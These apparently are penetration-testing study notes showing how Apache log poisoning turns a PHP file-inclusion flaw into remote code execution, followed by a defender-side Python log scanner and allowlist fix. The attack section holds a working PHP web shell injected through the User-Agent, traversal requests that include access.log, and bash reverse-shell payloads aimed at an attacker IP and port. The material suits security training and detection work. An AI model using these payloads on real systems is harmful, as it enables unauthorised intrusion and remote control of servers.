Apache & PHP <3
Our goal is to obtain Remote Code Execution (RCE) via an LFI vulnerability. We will do this with the help of Log Poisoning. Log Poisoning works by modifying data we send to a web application so that the logs contain executable code.
We will try to write executable code to Apache's access.log file in the /var/log/apache2/ directory (full path /var/log/apache2/access.log). We first need to review which information is controlled by us and saved by Apache in that log. In this case, "controlled" means that we can modify the information before we send it to the web application. We can either read the Apache web server documentation or display the file via LFI.
Example request (the PHP snippet placed in the User-Agent header is written into access.log):
GET /meteor/index.php?page=admin.php HTTP/1.1
Host: 192.168.208.16
User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: redirect_to=%2Fetc%2Fpasswd
Upgrade-Insecure-Requests: 1
Example request (including the poisoned log through the LFI and passing the command in the cmd parameter):
GET /meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ps HTTP/1.1
Host: 192.168.208.16
User-Agent: curl/7.88.1
Accept: */*
Connection: close
Payloads that can be used:
<?php echo system($_GET['cmd']); ?>
bash -i >& /dev/tcp/192.168.119.3/4444 0>&1
bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"
Faster way (the same reverse shell, URL-encoded for the cmd parameter; replace {ip} and {port}):
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip}%2F{port}%200%3E%261%22
Let's briefly explore LFI attacks on Windows targets. Exploiting LFI on Windows only differs from Linux when it comes to file paths and code execution. The PHP code snippet we used in this section for Linux also works on Windows, since we use the PHP system function, which is independent of the underlying operating system. When we use Log Poisoning on Windows, we should understand that the log files are located in application-specific paths. For example, on a target running XAMPP, the Apache logs can be found in C:\xampp\apache\logs.
Exploiting File Inclusion vulnerabilities depends heavily on the web application's programming language, the version, and the web server configuration. Outside PHP, we can also leverage LFI and RFI vulnerabilities in other frameworks or server-side scripting languages including Perl, Active Server Pages Extended, Active Server Pages, and Java Server Pages. Exploiting these kinds of vulnerabilities is very similar across these languages.
Let's consider an LFI vulnerability in a JSP web application. If we can write JSP code to a file using Log Poisoning and include this file with the LFI vulnerability, the code will be executed. The only difference between this example and the previous PHP demonstration is that the code snippet used for the Log Poisoning would be in a different language.
In real-life assessments, we'll most often discover File Inclusion vulnerabilities in PHP web applications, since most of the other frameworks and server-side scripting languages are dated and therefore less common. Additionally, modern frameworks and languages are often by design not vulnerable or have protection mechanisms enabled by default against LFI. However, we should be aware that we can also find LFI vulnerabilities in modern back-end JavaScript runtime environments like Node.js.
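As an added defender-side example (not part of the original notes and not taken from any course material), the following Python script scans constructed Apache combined-format log lines for the two halves of the technique described above: a request whose User-Agent, Referer or path carries a PHP, JSP or ASP open tag (the poisoning step), and a request whose page parameter, after URL decoding, traverses directories or names an access.log/error.log (the inclusion step). It also shows the allowlist lookup that removes the vulnerability from the include: the user-supplied value is a key into a fixed map, never a path fragment. The log lines, IP addresses and page names are constructed for the demo; the same regexes cover the Windows backslash form and the URL-encoded traversal shown later on this page.

```python
import re
from urllib.parse import unquote

# Constructed sample access.log lines (Apache combined format) for the demo.
# Hosts, paths and user agents are made up, not taken from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2024:10:00:02 +0000] "GET /index.php?page=admin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 <?php echo system($_GET['cmd']); ?>"
10.0.0.9 - - [10/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../../../../var/log/apache2/access.log&cmd=ps HTTP/1.1" 200 2048 "-" "curl/7.88.1"
10.0.0.9 - - [10/Jan/2024:10:00:04 +0000] "GET /index.php?page=..%2F..%2Fapache%2Flogs%2Faccess.log HTTP/1.1" 200 2048 "-" "curl/7.88.1"
10.0.0.7 - - [10/Jan/2024:10:00:05 +0000] "GET /index.php?page=contact HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Server-side open tags that have no business in a client-controlled header or URL:
# "<?php", "<?=", bare "<?" (PHP) and "<%" (JSP / classic ASP).
CODE_TAG_RE = re.compile(r'<\?(php|=)?|<%', re.IGNORECASE)
# "../" and "..\" traversal, checked after URL decoding.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')
# A request that names the web server's own log is the inclusion step.
LOG_PATH_RE = re.compile(r'(access|error)\.log', re.IGNORECASE)


def classify(line):
    """Return a list of finding labels for one log line (empty list = benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable-line"]
    # Decode twice so that double-encoded sequences such as %252e%252e%252f are caught.
    decoded_path = unquote(unquote(m["path"]))
    findings = []
    if any(CODE_TAG_RE.search(field) for field in (m["ua"], m["referer"], decoded_path)):
        findings.append("code-in-request")      # poisoning attempt
    if TRAVERSAL_RE.search(decoded_path):
        findings.append("path-traversal")       # escaping the intended directory
    if LOG_PATH_RE.search(decoded_path):
        findings.append("log-file-include")     # pulling the log back in via LFI
    return findings


def scan(log_text):
    """Map 1-based line numbers to their findings, skipping benign lines."""
    report = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        findings = classify(line)
        if findings:
            report[lineno] = findings
    return report


# Mitigation side: the page parameter selects a key, and only the mapped file is included.
# Page names here are hypothetical; a real application lists its own templates.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "contact": "pages/contact.php",
    "admin.php": "pages/admin.php",
}


def resolve_include(page_param):
    """Return the file to include for an allowlisted key, or None for anything else."""
    return ALLOWED_PAGES.get(page_param)


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(findings)}")
    print(resolve_include("home"), resolve_include("../../var/log/apache2/access.log"))
```

The scanner is meant to run over a copy of the log, not the live file, and the three labels map directly onto the steps above: "code-in-request" on its own is an attempt that only matters if the log is later included, so a host that shows "path-traversal" together with "log-file-include" shortly afterwards is the one to investigate first. The allowlist lookup is the fix: with resolve_include, a traversal string is simply not a key and nothing is included.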
Apache access.log on Windows (XAMPP):
C:\xampp\apache\logs\access.log
Example request:
GET /meteor/index.php?page=../../apache/logs/access.log HTTP/1.1
Host: 192.168.208.193
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: redirect_to=%2F
Upgrade-Insecure-Requests: 1